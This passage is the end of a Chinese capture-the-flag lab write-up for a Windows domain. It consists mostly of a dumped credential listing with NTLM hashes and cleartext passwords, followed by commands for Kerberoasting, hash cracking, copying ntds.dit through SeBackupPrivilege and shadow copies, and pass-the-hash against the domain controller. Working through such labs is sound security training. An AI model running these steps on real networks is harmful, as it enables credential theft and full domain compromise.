* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 3150114 (00000000:00301122)
Session : RemoteInteractive from 2
User Name : zhangshuai
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:13:09
SID : S-1-5-21-754105099-1176710061-2177073800-1001
msv :
[00000003] Primary
* Username : zhangshuai
* Domain : XR-0923
* NTLM : f97d5a4b44b11bc257a63c3f76f18a9a
* SHA1 : f6ff2714d556240436758527e190e329f05cd43d
tspkg :
wdigest :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 3150084 (00000000:00301104)
Session : RemoteInteractive from 2
User Name : zhangshuai
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:13:09
SID : S-1-5-21-754105099-1176710061-2177073800-1001
msv :
[00000003] Primary
* Username : zhangshuai
* Domain : XR-0923
* NTLM : f97d5a4b44b11bc257a63c3f76f18a9a
* SHA1 : f6ff2714d556240436758527e190e329f05cd43d
tspkg :
wdigest :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : zhangshuai
* Domain : XR-0923
* Password : wSbEajHzZs
ssp :
credman :
cloudap :
Authentication Id : 0 ; 3108560 (00000000:002f6ed0)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/3/10 19:13:08
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 64330 (00000000:0000fb4a)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 18:43:24
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 8519c5a89b2cd4d679a5a36f26863e5d
* SHA1 : 42d8188bc30ff0880b838e368c6e5522b86f978d
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZA+H?c2;V(AgGpKw*f0WvdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
ssp :
credman :
cloudap :
Authentication Id : 0 ; 64312 (00000000:0000fb38)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 18:43:24
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XR-0923$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-0923$
* Domain : XIAORANG.LAB
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 32395 (00000000:00007e8b)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID :
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 5985359 (00000000:005b544f)
Session : RemoteInteractive from 3
User Name : ocean
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:32:27
SID : S-1-5-21-754105099-1176710061-2177073800-1002
msv :
[00000003] Primary
* Username : ocean
* Domain : XR-0923
* NTLM : 579da618cfbfa85247acf1f800a280a4
* SHA1 : 39f572eceeaa2174e87750b52071582fc7f13118
tspkg :
wdigest :
* Username : ocean
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : ocean
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 5985329 (00000000:005b5431)
Session : RemoteInteractive from 3
User Name : ocean
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:32:27
SID : S-1-5-21-754105099-1176710061-2177073800-1002
msv :
[00000003] Primary
* Username : ocean
* Domain : XR-0923
* NTLM : 579da618cfbfa85247acf1f800a280a4
* SHA1 : 39f572eceeaa2174e87750b52071582fc7f13118
tspkg :
wdigest :
* Username : ocean
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : ocean
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 3109913 (00000000:002f7419)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:13:08
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 3109437 (00000000:002f723d)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:13:08
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/10 18:43:26
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/10 18:43:24
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 33498 (00000000:000082da)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 33470 (00000000:000082be)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XR-0923$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-0923$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
cloudap :
拿到flag
拿着这个机器的用户的hash去查看下spn
发现tianjing
proxychains4 python3 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':a4f432e39e79dc4ad8b85854ed243f61' -dc-ip 172.22.14.11 -request-user tianjing
用john爆破下hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
去登录一下
proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2
发现SeBackupPrivilege权限
SeBackupPrivilege 拷贝 sam
首先在本地创建一个raj.r2dsh文件,这里命名为raj.dsh,内容如下
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
接下来再用unix2dos将dsh文件的编码间距转换为Windows兼容的编码和间距
unix2dos raj.dsh
我们在C:/下创建一个test文件夹进去将raj.dsh拷贝进来
mkdir test
cd test
upload raj.dsh
最后 卷影拷贝
diskshadow /s raj.dsh
然后复制到当前目录
RoboCopy /b z:windowsntds . ntds.dit
然后备份注册表,再下载到本地
reg save hklmsystem system
download system
然后用impacket-secretsdump解密
impacket-secretsdump -ntds ntds.dit -system system local
拿到域管的hash打pth
proxychains4 python3 smbexec.py -hashes :70c39b547b7d8adec35ad7c09fb1d277 [email protected]
原文始发于微信公众号(土拨鼠的安全屋):春秋云镜系列靶场通过记录-Privilege
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论